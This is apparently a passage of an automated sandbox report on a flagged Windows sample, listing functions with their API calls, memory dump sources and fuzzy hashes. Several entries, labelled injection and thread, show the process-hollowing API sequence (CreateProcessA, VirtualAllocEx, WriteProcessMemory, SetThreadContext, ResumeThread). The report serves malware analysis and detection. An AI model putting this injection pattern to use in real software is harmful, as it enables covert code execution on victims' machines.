                                                                                          Function 6D02D2E0 Relevance: 3.1, APIs: 2, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D02D3E8
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D02D3FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 4063778783-0
                                                                                          • Opcode ID: 61480ed46764ec29323f96a085d3890115147b5878fe83168ed1b9ca04b6d2a2
                                                                                          • Instruction ID: 1d52bfe0a60cc3f4d97d82186efca2a0e7d324bfeca5845af7f42db170e0fcbf
                                                                                          • Opcode Fuzzy Hash: 61480ed46764ec29323f96a085d3890115147b5878fe83168ed1b9ca04b6d2a2
                                                                                          • Instruction Fuzzy Hash: 2A314A715097459FD704CF28D480A9ABBF4FF89714F508A2EF4558B790E731EA06CBA2
                                                                                          Function 6D018400 Relevance: 3.0, APIs: 2, Instructions: 48COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • std::exception::exception.LIBCMT ref: 6D018449
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D01845E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 4063778783-0
                                                                                          • Opcode ID: fecfbca1c8ebeff65d1861538b09ee496e1aea429e1419fb7db0af1f28598095
                                                                                          • Instruction ID: a39ffed55a5a188f7b8a604f85c1f80216c418eb8925e4ea7f0b9c0aa94fc6a5
                                                                                          • Opcode Fuzzy Hash: fecfbca1c8ebeff65d1861538b09ee496e1aea429e1419fb7db0af1f28598095
                                                                                          • Instruction Fuzzy Hash: 8901C874504208AFD708DF94E890DAAB7F5FF58300B51C1ADDD1A4B750EB30EA05CB95
                                                                                          Function 05CC0002 Relevance: 2.6, Strings: 2, Instructions: 90COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TJcq$Te^q
                                                                                          • API String ID: 0-918715239
                                                                                          • Opcode ID: 19c5d01759292fd65d367951ded5bd7a31d5aaeba5f62651ae787a485d001be8
                                                                                          • Instruction ID: 84d1fc4721c848042062c08b180db5935b8956702af1fab86a5cd49b98ee4875
                                                                                          • Opcode Fuzzy Hash: 19c5d01759292fd65d367951ded5bd7a31d5aaeba5f62651ae787a485d001be8
                                                                                          • Instruction Fuzzy Hash: 9631F131A093818FC716977888557AE7FB2EF87200F1905DFC086DB3A3DA294C0983A2
                                                                                          Function 6D018D60 Relevance: 2.6, APIs: 2, Instructions: 78COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,00000000,6D018C13,?,6D018CD3,?,6D018C13,00000000,?,?,6D018C13,?,?), ref: 6D018D73
                                                                                          • LeaveCriticalSection.KERNEL32(?,?,?,6D018CD3,?,6D018C13,00000000,?,?,6D018C13,?,?), ref: 6D018D8C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: f0e93837a51a454c0cbb7e780b3f315a1e3d6bd722dc63ccffc0e87f32b6b74b
                                                                                          • Instruction ID: 9e24d3ec9bec0671b9e39908efecaa81be9b1bd02bd0777a263d457d23106708
                                                                                          • Opcode Fuzzy Hash: f0e93837a51a454c0cbb7e780b3f315a1e3d6bd722dc63ccffc0e87f32b6b74b
                                                                                          • Instruction Fuzzy Hash: 7C21167520410AAFCB04CF88D890EAEB3FAFFC9210B118649F90687340C730EE16CBA1
                                                                                          Function 05CC0048 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TJcq$Te^q
                                                                                          • API String ID: 0-918715239
                                                                                          • Opcode ID: ed5e7c90271f2c8068482c7a0e78cd4de84caf4b18d905eef2a7ca0ef29191fd
                                                                                          • Instruction ID: 57da44dc1c395e8ed5e1d280e1e21e48cb4e8054dc4f235c108836f6abc4e891
                                                                                          • Opcode Fuzzy Hash: ed5e7c90271f2c8068482c7a0e78cd4de84caf4b18d905eef2a7ca0ef29191fd
                                                                                          • Instruction Fuzzy Hash: 43110330B001154BCB18ABA994587BFBBE6FFC8640F10446DD50AAB394CE359D0587E2
                                                                                          Function 6D018BC0 Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,6D016890,?), ref: 6D018BDD
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6D018C23
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 3168844106-0
                                                                                          • Opcode ID: 7b3da5219bbd519c06ddc3f0577f64efc57ebc719d6a03cfcad60b45dab99098
                                                                                          • Instruction ID: 356a9f94739b40d5a6684f6b761614b34cfae109798cd58ca6026e4a7121bf1f
                                                                                          • Opcode Fuzzy Hash: 7b3da5219bbd519c06ddc3f0577f64efc57ebc719d6a03cfcad60b45dab99098
                                                                                          • Instruction Fuzzy Hash: 48019A71709104AFDB00DFA8C880A9AF3A9FB9D200710426AEA05C7300DB32EE51CBD1
                                                                                          Function 0543BA24 Relevance: 1.8, APIs: 1, Instructions: 299processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0543BCFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 89f74fec073db51d30e55540aa0c941393f8997f02cf509bfcd04c583239c609
                                                                                          • Instruction ID: 842382884e77f5928eaff658ddd4bfb2551947676ddfff87bb3aba70316d6fa9
                                                                                          • Opcode Fuzzy Hash: 89f74fec073db51d30e55540aa0c941393f8997f02cf509bfcd04c583239c609
                                                                                          • Instruction Fuzzy Hash: 05B11570D042588FDB10CFA8C986BEEBBB1FB09304F1481AAD859A72A0DB749985CF45
                                                                                          Function 0543BA30 Relevance: 1.8, APIs: 1, Instructions: 295processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0543BCFF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0
                                                                                          • Opcode ID: 09c267cb20328c479fbc1eab0b5e2e232a721f62cb449074a56de7d5f6e3cb96
                                                                                          • Instruction ID: d9d074e3bc1c2c8643699101190c6404696ac353664ff847a17aa9624ca0205d
                                                                                          • Opcode Fuzzy Hash: 09c267cb20328c479fbc1eab0b5e2e232a721f62cb449074a56de7d5f6e3cb96
                                                                                          • Instruction Fuzzy Hash: D7B10570D042588FDB10CFA8C946BEEBBB1FB49304F14916AD859A72A0DB749985CF45
                                                                                          Function 0543C149 Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0543C225
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: a9ba53084e9431fdd5c110724bcc0031bcfefc1dc4480416410a52047ffdfb3c
                                                                                          • Instruction ID: badf77cb5c12c381dc8781cf353d252bda177446c577b286304ddf984c8f6603
                                                                                          • Opcode Fuzzy Hash: a9ba53084e9431fdd5c110724bcc0031bcfefc1dc4480416410a52047ffdfb3c
                                                                                          • Instruction Fuzzy Hash: 484177B5D042589FCB00CFA9D984AEEFBF1BF09310F24942AE818BB210D375A945CF64
                                                                                          Function 0543C150 Relevance: 1.6, APIs: 1, Instructions: 115injectionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0543C225
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          • Opcode ID: 83018b0459b0c46b0fb90e413c7da3a712c36e09f6aefafc4187945c18039c96
                                                                                          • Instruction ID: 9d06a0e9219f5a3b369c375553da559bfae24bf9325aefd36af6ef4491753961
                                                                                          • Opcode Fuzzy Hash: 83018b0459b0c46b0fb90e413c7da3a712c36e09f6aefafc4187945c18039c96
                                                                                          • Instruction Fuzzy Hash: B84167B5D042589FCB04CFA9D984ADEFBF1BF49310F24942AE818BB250D375A945CF64
                                                                                          Function 0543C028 Relevance: 1.6, APIs: 1, Instructions: 102memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0543C0DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 2ce2a1ed17c71835e1339b94ad3128be6ead6b616d71a7167d222d7a9b1752af
                                                                                          • Instruction ID: 2d96be2c6f549c498bd1099eac9fc70655a123219f2e0012e72828a68c0bc4d9
                                                                                          • Opcode Fuzzy Hash: 2ce2a1ed17c71835e1339b94ad3128be6ead6b616d71a7167d222d7a9b1752af
                                                                                          • Instruction Fuzzy Hash: 174166B9D002589FCF10CFA9D984A9EFBB1AB09310F14902AE918B7320D775A941CF68
                                                                                          Function 0543C030 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0543C0DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          • Opcode ID: 24708999ca79033445819ff1a9da8cab969afcdb23006511dcce5b3343b6ba52
                                                                                          • Instruction ID: 242ae69ed592e7e031c872705b87a65e8e913e4e5992814876746d475c5e766b
                                                                                          • Opcode Fuzzy Hash: 24708999ca79033445819ff1a9da8cab969afcdb23006511dcce5b3343b6ba52
                                                                                          • Instruction Fuzzy Hash: 2E3156B9D052589FCF10CFA9D984A9EFBF1BB09310F10902AE818B7220D775A941CF64
                                                                                          Function 6D017140 Relevance: 1.6, APIs: 1, Instructions: 92COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D032820: _malloc.LIBCMT ref: 6D032871
                                                                                          • std::tr1::_Xweak.LIBCPMT ref: 6D0171D2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Xweak_mallocstd::tr1::_
                                                                                          • String ID:
                                                                                          • API String ID: 4085767713-0
                                                                                          • Opcode ID: 5e94676a8414f145ae3434f2304005e8e70a98099a4b084cd68e6e7bd15e2c64
                                                                                          • Instruction ID: 1ebfa1e2ef66532b2a20f41ee3408cbe0e44e325d4338a51756fb5f4f5b29edb
                                                                                          • Opcode Fuzzy Hash: 5e94676a8414f145ae3434f2304005e8e70a98099a4b084cd68e6e7bd15e2c64
                                                                                          • Instruction Fuzzy Hash: 95315AB4A0874ADFDB10CFA9C880BAAB7F9FF89204B10865DE81697741D731E905CB90
                                                                                          Function 0543BF28 Relevance: 1.6, APIs: 1, Instructions: 84threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0543BFBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 58eec2d7d64d669e7a0d6001252e4dd3ebd5803e009a0bd357b0214a68b10af8
                                                                                          • Instruction ID: e642b2994f53a2f0bff89d6d30f9516880298cbf8305fd686d3a70ab2efd77d8
                                                                                          • Opcode Fuzzy Hash: 58eec2d7d64d669e7a0d6001252e4dd3ebd5803e009a0bd357b0214a68b10af8
                                                                                          • Instruction Fuzzy Hash: 4131B9B9D052589FCB10CFA9D584ADEFBF0EB49310F24906AE818B7310D335AA45CF68
                                                                                          Function 05432098 Relevance: 1.6, APIs: 1, Instructions: 82libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 0543213A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: a22ba2558f1a65290ab48bbf9d9da55c106e2933450f4ed3f0366612cc4b074b
                                                                                          • Instruction ID: 52e226cc4cd8e1e82e1989b4e5290c83886fc5cb09d58b9e0402764c34b7768b
                                                                                          • Opcode Fuzzy Hash: a22ba2558f1a65290ab48bbf9d9da55c106e2933450f4ed3f0366612cc4b074b
                                                                                          • Instruction Fuzzy Hash: E831DBB8D042189FCB14CFA9D984ADEFBF5BB49314F24806AE918B7320D374A945CF64
                                                                                          Function 05430510 Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 0543213A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 6c524f77f612eb8a476571ce53547d48d4fa7ddc0c66c998cf59aa523fa57adc
                                                                                          • Instruction ID: 9b692131efb77127a1be564a6244fa13aee600ed190a7b58096c2fcccb70759f
                                                                                          • Opcode Fuzzy Hash: 6c524f77f612eb8a476571ce53547d48d4fa7ddc0c66c998cf59aa523fa57adc
                                                                                          • Instruction Fuzzy Hash: 9731BAB8D042189FCB14CFA9D985ADEFBF1AB49314F14806AE918B7320D374A945CFA4
                                                                                          Function 0543BF30 Relevance: 1.6, APIs: 1, Instructions: 81threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 0543BFBB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 9e689c554474765e59e6ec531cd637233cf90970d50c9114937635cce007d6cf
                                                                                          • Instruction ID: 4f97b150e13f8b47eb5955f1a27ac3b52df7fcf6e2f6f47bf0e68a454e3f3f21
                                                                                          • Opcode Fuzzy Hash: 9e689c554474765e59e6ec531cd637233cf90970d50c9114937635cce007d6cf
                                                                                          • Instruction Fuzzy Hash: 5E31CAB4D012589FCB10CFA9D584ADEFBF0AB09310F20906AE818B7310C334A944CF64
                                                                                          Function 0543C2A0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 0543C325
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: 75152cad958e0026681d72278191848fe59beca066603797fa876223e7b87c66
                                                                                          • Instruction ID: 2621684cb111446f72f1df95c00dccdb655e621ad3491455edc6f6bdd5a4155c
                                                                                          • Opcode Fuzzy Hash: 75152cad958e0026681d72278191848fe59beca066603797fa876223e7b87c66
                                                                                          • Instruction Fuzzy Hash: 773198B5D012589FCB10DFA9E985ADEFBF4BB09314F10902AE818B7310D735A941CFA8
                                                                                          Function 0543C2A8 Relevance: 1.6, APIs: 1, Instructions: 71threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 0543C325
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1767288681.0000000005430000.00000040.00000800.00020000.00000000.sdmp, Offset: 05430000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5430000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          • Opcode ID: a8d14c20a2a236e2a639d8a2bfd1f50c05f75e26582d5216c7e07b85ef78ebc4
                                                                                          • Instruction ID: a88ddd7eb82299847bcbf55b71c3564ca33c583224f57eb57078eb355c634168
                                                                                          • Opcode Fuzzy Hash: a8d14c20a2a236e2a639d8a2bfd1f50c05f75e26582d5216c7e07b85ef78ebc4
                                                                                          • Instruction Fuzzy Hash: 2C3178B4D012589FCB10CFA9D585ADEFBF4BB49314F10906AE818B7310D775A941CF64
                                                                                          Function 6D02EA40 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 6D069BB5: _malloc.LIBCMT ref: 6D069BCF
                                                                                          • SysAllocString.OLEAUT32 ref: 6D02EA8D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString_malloc
                                                                                          • String ID:
                                                                                          • API String ID: 959018026-0
                                                                                          • Opcode ID: 1a40a4e43b7733bd9c5ce32c95681345f7470674bfa21b6f5d5f18dcbec0b270
                                                                                          • Instruction ID: 4a21b576ba546f3e69a20346ec7743addeca354cb8ce0898abf29368f165b9a7
                                                                                          • Opcode Fuzzy Hash: 1a40a4e43b7733bd9c5ce32c95681345f7470674bfa21b6f5d5f18dcbec0b270
                                                                                          • Instruction Fuzzy Hash: 8A0192B2845B55EBE720CF64C900BAAB7F8FB05B24F11432AEC15E7780D7B5A900CAD4
                                                                                          Function 6D069D21 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                          Download Yara Rule
